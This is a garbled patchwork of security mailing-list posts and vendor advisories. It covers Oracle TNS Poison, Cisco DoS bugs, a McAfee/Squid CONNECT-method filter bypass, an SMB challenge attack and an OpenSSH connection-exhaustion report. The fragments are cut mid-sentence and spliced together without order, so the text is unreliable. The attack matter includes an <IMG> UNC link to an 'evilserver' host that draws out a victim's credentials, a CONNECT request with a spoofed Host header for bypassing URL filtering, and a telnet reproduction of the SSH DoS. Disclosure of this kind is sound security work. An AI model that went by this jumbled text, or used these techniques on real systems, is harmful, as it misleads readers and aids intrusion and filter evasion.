reconnect
inaccessible by means of the prefetch cache control directive.
The procedure is very simple: sending a simple GET HTTP/1.1 request
to the victim URL several times will make the proxies no longer serve
it. Users will be waiting for about two minutes and then the TCP
connection will be closed, which, depending on the user agent, will
be interpreted as a valid zero-length HTTP 0.9 reply or as an error.
It is worth noting that this attack affects the URL EXACTLY. For
instance, attacking http://www.google.com/ will not block
http://www.google.com./ (notice the dot before the last slash), nor
to the latest one (Oracle 11g) without the CPU-APR-2012. The bug was
reported to Oracle in 2008 so it "only" took them 4 years to fix the
vulnerability since reported.
The vulnerability I called TNS Poison affects the component called TNS
Listener, which is responsible for connection establishment. To
exploit the vulnerability no privilege is needed, just network access to
the TNS Listener. The "feature" exploited is enabled by default in all
Oracle versions starting with Oracle 8i and ending with Oracle 11g
(without CPU-APR-2012).
Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unity Connection
Advisory ID: cisco-sa-20120229-cuc
Revision 1.0
For Public Release 2012 February 29 16:00 UTC (GMT)
Summary
=======
Cisco IOS Software Release 15.1(2)T is affected by a denial of
service (DoS) vulnerability during the TCP establishment phase. The
vulnerability could cause embryonic TCP connections to remain in a
SYNRCVD or SYNSENT state. Enough embryonic TCP connections in these
states could consume system resources and prevent an affected device
from accepting or initiating new TCP connections, including any
TCP-based remote management access to the device.
To be clear, the CONNECT request is a single request/response cycle between the client and the proxy. Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic). There is nothing that explicitly disallows inclusion of the host header in a CONNECT request. Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.
The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.
Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).
Also, whether the McAfee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy, is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.
exhaustive).
Since this problem was also found on Windows versions as old as Windows
NT4, this scenario might still be possible.
(ii) An attacker A connects to system S and sends multiple 'SMB
Negotiate Protocol Request' packets with the 'Flags2' field set to
0xc001 to obtain several challenges, and stores them. The attacker A
then forces a user U on system S to connect to his own specially crafted
SMB server, for example by sending an email with multiple <IMG> tags
with UNC links (e.g.: <IMG SRC=\\evilserver\share\a.jpg>) or a link to
Cisco IOS Software contains a vulnerability when the Cisco IOS SSL
VPN feature is configured with an HTTP redirect. Exploitation could
allow a remote, unauthenticated user to cause a memory leak on the
affected devices, that could result in a memory exhaustion condition
that may cause device reloads, the inability to service new TCP
connections, and other denial of service (DoS) conditions.
Cisco has released free software updates that address this
vulnerability. There is a workaround to mitigate this vulnerability.
This advisory is posted at
=======
Cisco ASA 5500 Series Adaptive Security Appliances are affected by the
following vulnerabilities:
* TCP Connection Exhaustion Denial of Service Vulnerability
* Session Initiation Protocol (SIP) Inspection Denial of Service
Vulnerabilities
* Skinny Client Control Protocol (SCCP) Inspection Denial of
Service Vulnerability
* WebVPN Datagram Transport Layer Security (DTLS) Denial of Service
SIP processing errors.
IPSec Client Authentication Processing Vulnerability
Cisco PIX and Cisco ASA devices that terminate remote access VPN
connections are vulnerable to a denial of service attack if the
device is running software versions prior to 7.2(4)2, 8.0(3)14, and
8.1(1)4. Cisco PIX and Cisco ASA devices that run software versions
7.0 and 7.1 are not affected by this vulnerability.
SSL VPN Memory Leak Vulnerability
I'm unclear - exactly how does an ICMP echo cycle have anything to do with the apparent disparity between the host portion of the CONNECT URI and the contents of the host header?
I can see the logic in:
1. comparing the HOST header to the host portion of the CONNECT URI
2. resolving either to a name or IP address (depending on its original state)
3. comparing the resolved results to each other (DNS RR records will be an interesting case)
The thing to bear in mind is that reverse resolution (IP-to-name) on the Internet tends to be flaky to the point of completely useless.
There are two main problems:
In McAfee Web Gateway it is possible to convert GET methods into CONNECT
methods, and after the connection, send the same GET packet, without
modification and without cryptography. Even with the GET packets
passing through the proxy without cryptography and with the Host field
pointing to a filtered site, the proxy will accept it.
I think it is a vulnerability!
See my python code.
Thanks
disclosure and man in the middle attacks.
Background:
Aten produces several IP KVM switches. These devices can be used like a
normal KVM switch with an attached keyboard, mouse and monitor.
However, it is also possible to access the hosts connected to the kvm
switch via a network using an ordinary PC as a client. As this can
also be used via an insecure network, it is very important that this
connection is cryptographically protected against sniffing of
confidential data (e.g. keystrokes, monitor signals) and man in the
middle attacks. The affected products provide an SSL encrypted web
What I understand from the advisory is the Squid proxy is basing its
filtering on the Host header when present, even for the CONNECT
command which doesn't allow this header at all as it makes no sense. I
haven't confirmed the bug but what's being described is definitely a
vulnerability.
There's also a small misconception in what you said. The proxy will
see the entire CONNECT request, headers and all - after the request
headers there'll be a pair of newlines, and only *then* the remaining
data is tunneled transparently. So it's the second request's headers
Hello,
We might be able to fix this by simply doing a ping to the website
before connecting, so that the IP of the host specified matches the
connect field. In any case, the consistency of the host and connect is
indeed a big design flaw.
- Vikram
On Mon, Apr 16, 2012 at 6:12 PM, Gabriel Menezes Nunes
Devices running software versions on the 8.0 release that are
configured for Telnet, Secure Shell (SSH), WebVPN, SSL VPN, or ASDM
enabled are affected by this vulnerability.
The telnet command is used to identify the IP addresses from which the
security appliance accepts Telnet connections.
ASA(config)# telnet 192.168.10.0 255.255.255.0 inside
In the previous example, the Cisco ASA is configured to accept Telnet
connections on the inside interface from the 192.168.10.0/24 network.
Oracle is a widely-deployed Database Management System (DBMS) that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, restricting a middle tier to establish the database connection on behalf of the users. The standard authentication mechanism requires the client, the middle tier in this case, to provide valid credentials in order to authenticate and connect to the DBMS. User sessions are then created through the proxy connection. Oracle TNS protocol messages are used for session setup, authentication and data transfer.
Scope
Imperva’s Application Defense Center (ADC) conducts extensive research on enterprise applications and databases. During its research, the team has identified a vulnerability in Oracle’s proxy authentication and access control mechanism.
Findings
A forward proxy server when presented with a CONNECT request is solely responsible for attempting to facilitate an end-to-end encrypted path between the requesting client and the far end server. The CONNECT method does no more than create a temporary hole in your firewall.
Only once that is done is a normal HTTP request, including headers such as the Host: header, passed over the encrypted path by the client. Most crucially, the proxy server cannot see the HTTP request or its headers due to the end-to-end encryption. You can use the encrypted path to carry any protocol or data you like and the proxy server is quite oblivious to it as it is opaque to the proxy.
The only access control that the proxy server can perform is based on the CONNECT method request and the server identified in it by either IP number or FQDN and port.
You do not say what the acl is that you have asked Squid to apply but it cannot involve any examination of the Host: header of a request if the CONNECT method is used; only the far end server can see that.
The same conclusion also applies to your other post about a vulnerability with "McAfee Web Gateway URL Filtering Bypass".
Date: 09.09.2009
________________________________________________________________________
Vendor: Microsoft Corporation
Product: Microsoft Windows XP/Vista TCP/IP-Stack
Vulnerability: TCP/IP Orphaned Connections Vulnerability
Affected Releases: Windows Vista Business SP1/ Windows XP SP3
Severity: Moderate
CVE: CVE-2009-1926
________________________________________________________________________
# CVE: CVE-2012-2212
I found a vulnerability in McAfee Web Gateway 7 that allows access to
filtered sites.
The appliance believes in the Host field of HTTP Header using CONNECT method.
Example
CONNECT 66.220.147.44:443 HTTP/1.1
Host: www.facebook.com
Vendor: Ruby
Vendor URL: http://www.ruby-lang.org
Versions affected: 1.8.5, 1.8.6, Trunk Ruby
Systems Affected: All Ruby Platforms
Severity: Medium - Compromise of SSL connection integrity
Author: Chris Clark <cclark[at]isecpartners[dot]com>
Vendor notified: Yes
Public release: Yes
Advisory URL: http://www.isecpartners.com/advisories/2007-006-rubyssl.txt
/*
Family Connections <= 1.8.2 - Remote Shell Upload Exploit
Author: Salvatore "drosophila" Fresta
Contact: drosophilaxxx@gmail.com
Date: 3 April 2009
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Firebird SQL op_connect_request main listener shutdown vulnerability
1. *Advisory Information*
Title: Firebird SQL op_connect_request main listener shutdown vulnerability
If APR_HAS_UNICODE_FS is set to 1 then we have a defined charset, and this is present on Windows systems. But on Unix and Linux systems the charset is not defined.
--- EXAMPLE 1 ---
# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'
GET /icons/ http/1.1
Host: localhost
Content-type: text/html
OpenSSH 4.X deny remote connections.
The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.
To reproduce:
telnet 3.1.33.7 22
Step-by-step instructions for debugging IOS using gdb - Andy Davis,
2008 (iosftpexploit "at" googlemail <dot> com):
I have been asked by many people for a simple step-by-step guide for
setting up an IOS exploit development environment, which includes
connecting to a Cisco router using gdb, so here goes:
(By the way the router I connect to is a Cisco 2621XM)
Installing and configuring minicom:
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 1 Apr 2009
of other methods are CRAM-MD5 or DIGEST-MD5.
Example for the "port 25" service:
$ telnet server.example.com 25
Connected to server.example.com.
Escape character is '^]'.
220 server.example.com ESMTP Postfix
ehlo client.example.com
250-server.example.com
250-PIPELINING
Vendor description:
---------------
The SonicWALL Global VPN Client provides mobile users with access to
mission-critical network resources by establishing secure connections to
their office network's IPSec-compliant SonicWALL VPN gateway.
Vulnerability overview:
---------------
Affected Products
=================
This vulnerability affects all unfixed versions of Cisco IOS XR
Software devices configured to accept SSHv1 connections. Details on
the affected versions can be found in the Software Versions and Fixes
section of this advisory.
Vulnerable Products
+------------------
The other possible exploit is that I work for company X. After being fired from company X I setup a second rogue network and have people connect to it. Thus giving me the option to steal passwords or present false information via a fake intranet site or whatever. Since I worked there I already know the wpa key.
-----Original Message-----
From: Security Mailing List <s3clist@hotmail.com>
Date: Thu, 15 Mar 2012 10:33:19
To: Zach C.<fxchip@gmail.com>